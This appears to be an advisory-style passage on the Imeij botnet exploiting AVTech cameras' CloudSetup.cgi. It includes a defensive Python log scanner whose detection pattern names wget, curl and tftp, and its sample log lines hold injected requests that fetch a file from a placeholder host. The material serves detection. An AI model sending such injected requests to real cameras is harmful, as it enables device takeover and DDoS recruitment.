Imeij targets Linux-based devices and specifically exploits a vulnerability in AVTech video surveillance equipment. The vulnerability affects devices that support AVTech’s cloud service, which contains the Common Gateway Interface (CGI) component CloudSetup.cgi. Attackers can use this component to execute malicious commands. Imeij uses the vulnerability to make the devices download malware in order to conduct DDoS attacks. As of the date of this post, AVTech has not responded to disclosure reports regarding this vulnerability.
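Requests that reach CloudSetup.cgi can be reviewed in the access logs of a proxy or gateway placed in front of the cameras. The Python example below is added here and is not code from the original post or from AVTech; only the component name CloudSetup.cgi comes from the text above, while the log lines, the `/cgi-bin/` directory, the `PARAM` parameter name and the addresses are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Common/combined log format: client, timestamp, method, target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
# Signs that a query carries a shell command rather than a setting:
# command separators or substitution, or the name of a fetch tool.
SHELL_RE = re.compile(r'[;|`]|&&|\$\(|\b(?:wget|curl|tftp)\b', re.I)

def scan(lines):
    """Return one finding per logged request that touches CloudSetup.cgi."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        client, when, method, target, status = m.groups()
        parts = urlsplit(target)
        # Decode the path so percent-encoded spellings of the name still match.
        if not unquote(parts.path).lower().endswith("/cloudsetup.cgi"):
            continue
        # Decode twice so double-encoded separators are also visible.
        query = unquote_plus(unquote_plus(parts.query))
        severity = "high" if SHELL_RE.search(query) else "review"
        findings.append({"client": client, "time": when, "method": method,
                         "status": int(status), "severity": severity,
                         "query": query})
    return findings

# Constructed sample log lines (documentation addresses, placeholder
# directory and parameter name); they are not taken from a real incident.
SAMPLE = [
    '203.0.113.7 - - [12/Mar/2017:04:11:02 +0000] '
    '"GET /cgi-bin/CloudSetup.cgi?PARAM=wget%20http://192.0.2.50/sample HTTP/1.1" 200 0',
    '203.0.113.9 - - [12/Mar/2017:04:12:40 +0000] '
    '"GET /cgi-bin/CloudSetup.cgi?PARAM=x%253Bcurl%2520http://192.0.2.50/sample HTTP/1.1" 200 0',
    '198.51.100.4 - - [12/Mar/2017:05:00:00 +0000] '
    '"GET /cgi-bin/CloudSetup.cgi HTTP/1.1" 404 162',
    '198.51.100.4 - - [12/Mar/2017:05:00:03 +0000] '
    '"GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f["severity"], f["client"], f["time"], f["status"], f["query"])
```

Any hit marked `review` is still worth a look, since a surveillance camera's setup CGI should not normally receive requests from untrusted networks.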

Reporting and Technical Details

  • October 2016: AVtech Devices Multiple Vulnerabilities (Search-Lab)
  • March 2017: Imeij Botnet Malware Targets IoT Cameras (Silicon)